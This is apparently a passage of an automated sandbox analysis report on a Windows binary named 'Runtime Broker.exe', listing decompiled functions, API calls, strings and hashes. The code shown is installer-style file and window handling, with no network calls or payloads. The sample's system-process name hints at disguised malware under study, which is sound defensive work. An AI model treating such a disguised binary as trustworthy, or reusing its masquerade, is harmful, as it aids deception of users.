				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E00406579(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a274 + 0x128)));
						_t12 = E00406032(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B5(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F97(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F97(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FED(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060E4(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406032(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406188
0x00406191
0x00406198
0x004061a2
0x004061b6
0x004061de
0x004061e5
0x004061e9
0x004061ed
0x0040620d
0x00406214
0x0040621e
0x0040622b
0x00406230
0x00406235
0x00406239
0x00406248
0x0040624a
0x00406257
0x0040625b
0x004062f6
0x00000000
0x00406271
0x0040627e
0x004062a2
0x004062a6
0x004062c5
0x004062c9
0x004062c9
0x004062cb
0x004062d4
0x004062df
0x004062ea
0x004062f0
0x00000000
0x004062f0
0x004062a8
0x004062ab
0x004062b6
0x004062b2
0x004062b4
0x004062b5
0x004062b5
0x004062bd
0x004062bf
0x00000000
0x004062bf
0x00406289
0x0040628f
0x00000000
0x0040628f
0x0040625b
0x00406239
0x004061b8
0x004061c3
0x004061cc
0x004061d0
0x00000000
0x00000000
0x004061d0
0x00406301

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
GetShortPathNameW.KERNEL32 ref: 004061CC

Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9

GetShortPathNameW.KERNEL32 ref: 004061E9
wsprintfA.USER32 ref: 00406207
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
GlobalFree.KERNEL32 ref: 004062F0
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7

Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058

Strings

%ls=%ls, xrefs: 004061FD
uB, xrefs: 004061DE
[Rename], xrefs: 00406271, 00406283
uB, xrefs: 004061E5
mB, xrefs: 004061B1

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 0e349bceaff302caa424ff24830ddfb5d0a14e47e24551b26cd9cce9b48995c7
Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
Opcode Fuzzy Hash: 0e349bceaff302caa424ff24830ddfb5d0a14e47e24551b26cd9cce9b48995c7
Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a274;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004055A4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055A4(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a334;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406579(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004055aa
0x004055b4
0x004055b9
0x004055bf
0x004055ca
0x004055cd
0x004055d0
0x004055d6
0x004055d6
0x004055dc
0x004055e4
0x004055e7
0x00405604
0x00405608
0x00405611
0x00405611
0x0040561b
0x00405624
0x00405630
0x00405637
0x0040563b
0x0040563e
0x00405651
0x0040565f
0x0040565f
0x00405663
0x00405665
0x00405668
0x00000000
0x00405668
0x004055e9
0x004055f1
0x004055f9
0x004055ff
0x00000000
0x004055ff
0x004055f9
0x004055e7
0x00405674

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
SetWindowTextW.USER32(00422728,00422728), ref: 00405611
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F

Strings

('B, xrefs: 004055C5

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: ('B
API String ID: 2531174081-2332581011
Opcode ID: 9bf9a61cd925c99f1fada79dadb4955d0c20c7cfe3de02ce5ad3df310078830f
Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
Opcode Fuzzy Hash: 9bf9a61cd925c99f1fada79dadb4955d0c20c7cfe3de02ce5ad3df310078830f
Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004067EB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067EB(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E88(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E3E(L"*?|<>/\":", _t5))) == 0) {
							E00405FED(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067ed
0x004067f6
0x0040680d
0x0040680d
0x00406814
0x00406820
0x00406820
0x00406823
0x00406826
0x0040682b
0x0040682d
0x00406836
0x0040683a
0x00406857
0x0040685f
0x0040685f
0x00406864
0x00406866
0x00406869
0x0040686e
0x0040686f
0x00406873
0x00406873
0x00406874
0x0040687b
0x0040687d
0x00406884
0x00000000
0x00000000
0x0040688c
0x00406892
0x00000000
0x00000000
0x00000000
0x00406892
0x00406897

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Runtime Broker.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Runtime Broker.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Runtime Broker.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875

Strings

*?|<>/":, xrefs: 0040683D
C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
"C:\Users\user\Desktop\Runtime Broker.exe" , xrefs: 004067EB

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Runtime Broker.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1295671664
Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 004044F9, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044F9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040450b
0x004045c1
0x00000000
0x004045c1
0x0040451c
0x00404520
0x00000000
0x0040453a
0x0040453a
0x00404543
0x00000000
0x00000000
0x00404545
0x00404551
0x00404554
0x00404554
0x0040455a
0x00404560
0x00404560
0x0040456c
0x00404572
0x00404579
0x0040457c
0x0040457f
0x00404581
0x00404581
0x00404589
0x0040458f
0x0040458f
0x00404599
0x0040459e
0x004045a1
0x004045a6
0x004045a9
0x004045a9
0x004045b9
0x004045b9
0x00000000
0x004045bc

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404516
GetSysColor.USER32(00000000), ref: 00404554
SetTextColor.GDI32(?,00000000), ref: 00404560
SetBkMode.GDI32(?,?), ref: 0040456C
GetSysColor.USER32(?), ref: 0040457F
SetBkColor.GDI32(?,?), ref: 0040458F
DeleteObject.GDI32(?), ref: 004045A9
CreateBrushIndirect.GDI32(?), ref: 004045B3

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004026E4, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D1C(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a308 =  *0x42a308 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649C(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406113( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B5( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406483( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026e4
0x004026e6
0x004026e9
0x004026eb
0x004026ee
0x004026f3
0x004026f7
0x004026fa
0x004026fd
0x00402bc2
0x00402bc5
0x00402703
0x00402703
0x0040270a
0x0040270c
0x0040270c
0x00402712
0x00402876
0x00402876
0x00402879
0x0040287e
0x004015b6
0x00402925
0x00402925
0x00000000
0x00402718
0x00402719
0x00402724
0x00402727
0x00402733
0x00402737
0x004027cf
0x004027e7
0x004027f7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040273d
0x0040273d
0x00402740
0x00402741
0x00402744
0x00402749
0x00402750
0x00402758
0x00000000
0x0040275e
0x0040275e
0x00402763
0x00000000
0x00402769
0x00402769
0x00402771
0x00402774
0x00402777
0x00402832
0x00402839
0x0040277d
0x00402783
0x0040278f
0x004027f9
0x004027f9
0x00402791
0x00402791
0x00402794
0x00402796
0x00402796
0x00402796
0x00402799
0x0040279e
0x004027a1
0x00000000
0x00000000
0x004027a3
0x004027a6
0x004027b4
0x004027ba
0x004027c8
0x00000000
0x004027ca
0x00000000
0x004027ca
0x00000000
0x004027c8
0x00402796
0x004027fc
0x004027ff
0x00000000
0x00402801
0x00402806
0x00402847
0x00402869
0x00402870
0x00402855
0x00402855
0x00402858
0x0040285b
0x0040285e
0x0040285e
0x00000000
0x0040280f
0x0040280f
0x00402812
0x00402815
0x0040281b
0x0040281f
0x00402822
0x00000000
0x00000000
0x00000000
0x00000000
0x00402822
0x00402806
0x004027ff
0x00402777
0x00402763
0x00402758
0x00000000
0x00402824
0x00402824
0x00402827
0x00402830
0x00000000
0x00402727
0x00402712
0x00402bcb
0x00402bd1

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402750
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4

Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870

Strings

9, xrefs: 00402733

Memory Dump Source

